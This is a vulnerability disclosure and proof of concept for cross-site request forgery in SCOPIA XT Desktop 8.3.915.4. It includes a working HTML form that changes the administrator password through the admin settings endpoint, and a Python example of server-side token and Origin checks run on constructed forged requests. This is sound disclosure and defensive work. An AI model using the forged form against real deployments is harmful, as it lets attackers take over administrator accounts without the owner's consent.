Exploit CSRF on SCOPIA XT Desktop version 8.3.915.4

This PoC describes how to exploit Cross-Site Request Forgery (CSRF) on SCOPIA XT Desktop version 8.3.915.4.


About SCOPIA

website: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


About Cross-Site Request Forgery (CSRF)

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.


Proof of Concept - change admin password

On the "Directory and Authentication" page, the administrator is able to change his password.

Capturing the request with Burp Suite, I could see that an anti-CSRF token was not implemented and the only security mechanism is the session cookie.

I created this HTML file that served as a PoC to exploit the vulnerability presented.

<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

When it was run in a browser that had a valid cookie for the SCOPIA XT Desktop administration environment, it was possible to change the password of the user admin to "attacker".
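
The server-side check that the captured request lacked, as an added example (not code from this write-up or from the product): a per-session anti-CSRF token plus an Origin check, run over constructed requests shaped like the PoC form. The csrf_token field name, SERVER_KEY, TRUSTED_ORIGIN and the sample session id are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: per-deployment server secret; generated here so the example runs offline.
SERVER_KEY = secrets.token_bytes(32)
# Assumption: origin the admin UI is served from (placeholder host used in the PoC form).
TRUSTED_ORIGIN = "http://example.org"


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the settings form: random nonce + HMAC bound to the session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def check_state_change(method, headers, cookies, form):
    """Return (allowed, reason) for a request to a state-changing admin endpoint."""
    if method != "POST":
        return False, "state changes must use POST"
    session_id = cookies.get("JSESSIONID")
    if not session_id:
        return False, "no session"
    # Modern browsers send Origin on form POSTs; when present it must be ours.
    origin = headers.get("Origin")
    if origin is not None and origin != TRUSTED_ORIGIN:
        return False, "cross-origin request"
    nonce, _, mac = form.get("csrf_token", "").partition(".")  # hypothetical field name
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    if not nonce or not hmac.compare_digest(mac.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic): (method, headers, cookies, form).
SESSION = {"JSESSIONID": "constructed-session-id"}
FIELDS = {"newadminusername": "", "newadminpassword": "constructed-value", "checkstatus": "true"}
forged = ("POST", {"Origin": "http://attacker.invalid"}, SESSION, dict(FIELDS))
forged_no_origin = ("POST", {}, SESSION, dict(FIELDS))
legit = ("POST", {"Origin": TRUSTED_ORIGIN}, SESSION,
         {**FIELDS, "csrf_token": issue_csrf_token(SESSION["JSESSIONID"])})
other_session = ("POST", {"Origin": TRUSTED_ORIGIN}, SESSION,
                 {**FIELDS, "csrf_token": issue_csrf_token("someone-else")})

if __name__ == "__main__":
    for req in (forged, forged_no_origin, legit, other_session):
        print(req[1].get("Origin"), check_state_change(*req))
```

The session cookie is attached by the browser to all four requests; only the one carrying a token issued for that same session is accepted.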
